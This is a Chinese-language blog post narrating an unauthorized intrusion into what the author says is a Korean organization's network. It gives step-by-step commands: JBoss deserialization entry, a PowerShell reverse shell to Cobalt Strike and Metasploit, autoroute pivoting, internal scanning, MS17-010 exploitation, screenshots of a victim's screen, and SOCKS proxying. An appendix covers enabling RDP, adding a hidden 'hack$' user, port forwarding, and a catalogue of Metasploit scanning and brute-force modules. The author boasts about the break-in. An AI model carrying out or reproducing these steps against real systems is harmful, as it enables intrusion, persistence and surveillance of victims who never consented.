一次实战内网漫游

本人喜欢在各大群里吹牛X，突然看到有人问3389端口怎么转发，卧槽搞事情，连忙加上好友怕装X赶不上热乎，从此刻开始了一次内网漫游。

经过一番了解，是一台韩国主机存在JBOSS反序列化，内网主机端口映射到外网8080，掏出我的尘封已久的宝贝。

我喜欢使用Cobalt Strike来接收shell，因为有心跳不易断开连接，接下来利用powershell反弹shell。

生成powershell并执行。

OK接收到shell,接下来将shell外联到msf 。

host 填写 msf的ip port则为msf监听的端口。

msf设置监听。

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost 127.0.0.1

set lport 6666

run

cs进行联动。

msf接收到shell，并查看路由表。

route list #查看路由

run autoroute -s #添加一条去内网ip的路由

run autoroute -p # 查看路由

用tcp扫描内网网段端口主机存活情况。

use auxiliary/scanner/portscan/tcp

set rhosts 192.168.0.1/24

set threads 50

run

看到开放不少445，可以侦探下ms17-010.

这么多ms17，韩国人都不打补丁的吗？

use auxiliary/scanner/smb/smb_ms17_010 #探测ms17-010

set rhosts 192.168.0.1/24

set threads 50

run

打一波ms17-010,在另外多开一个msf窗口设置监听。

设置ms17-010exp进行攻击。

use exploit/windows/smb/ms17_010_psexec

set payload windows/meterpreter/reverse_tcp

set lhost #接收ip

set lport #接收端口

set rhost #漏洞主机ip

run

另外一个在监听的msf接收到shell。

screenshot #截图

看一眼韩国人在干嘛，有点看不懂。

刚才扫描内网端口看到192.168.0.1有80端口，估计是个路由器我过去看看。

use auxiliary/server/socks4a

run

设置socks隧道代理

设置好可以利用proxychains 进行代理访问内网。

使用nmap扫描内网。

firefox浏览器使用代理打开即可访问内网web。

访问192.168.0.1发现是路由器设置页面无需密码即可访问。

内网才这么几台电脑？？瞬间没什么兴趣了。

V**？？还可以啦。

就到这里吧，ms17-010就可以给内网打完了，就不用什么smb弱口令扫描，ipc入侵，一堆弱口令扫描了，内网里没什么环境。

---------------------------------------------------------------------------

远程桌面（端口转发）：

run getgui -e #开启远程桌面 run getgui -u hack$ -p 123.com # 添加用户

portfwd add -l 1111 -p 3389 -r 192.168.0.13//将192.135主机3389转发本机111

rdesktop -u 账号 -p 密码 本机ip:端口 // 远程连接

内网扫描模块：

1，端口扫描

auxiliary/scanner/portscan scanner/portscan/ack ACK防火墙扫描 scanner/portscan/ftpbounce FTP跳端口扫描 scanner/portscan/syn SYN端口扫描 scanner/portscan/tcp TCP端口扫描 scanner/portscan/xmas TCP"XMas"端口扫描

2，SMB扫描

auxiliary/scanner/smb/smb_enumusers smb枚举 auxiliary/scanner/smb/pipe_dcerpc_auditor 返回DCERPC信息 auxiliary/scanner/smb/smb2 扫描SMB2协议 auxiliary/scanner/smb/smb_enumshares 扫描smb共享文件 auxiliary/scanner/smb/smb_enumusers 枚举系统上的用户 auxiliary/scanner/smb/smb_login SMB登录 use windows/smb/psexec (通过md5值登录)SMB登录 auxiliary/scanner/smb/smb_lookupsid 扫描组的用户 auxiliary/scanner/smb/smb_version 扫描系统版本

3，mssql扫描(端口tcp1433udp1434)

admin/mssql/mssql_enum MSSQL枚举 admin/mssql/mssql_exec MSSQL执行命令 admin/mssql/mssql_sql MSSQL查询 scanner/mssql/mssql_login MSSQL登陆工具 scanner/mssql/mssql_ping 测试MSSQL的存在和信息

4，smtp扫描

auxiliary/scanner/smtp/smtp_enum smtp枚举 auxiliary/scanner/smtp/smtp_version 扫描smtp版本

5，ssh扫描

auxiliary/scanner/ssh/ssh_login ssh登录 auxiliary/scanner/ssh/ssh_login_pubkey ssh公共密钥认证登录 auxiliary/scanner/ssh/ssh_version 扫描ssh版本测试

6，telnet扫描

auxiliary/scanner/telnet/telnet_login telnet登录 auxiliary/scanner/telnet/telnet_version 扫描telnet版本

7，tftp扫描

auxiliary/scanner/tftp/tftpbrute 扫描tftp的文件

scanner/ftp/anonymous ftp版本扫描

auxiliary/scanner/discovery/arp_sweep ARP扫描

auxiliary/scanner/discovery/udp_probe 扫描UDP服务的主机 auxiliary/scanner/discovery/udp_sweep 检测常用的UDP服务 auxiliary/sniffer/psnuffle sniffer密码 scanner/snmp/community snmp扫描 scanner/vnc/vnc_none_auth vnc扫描无认证扫描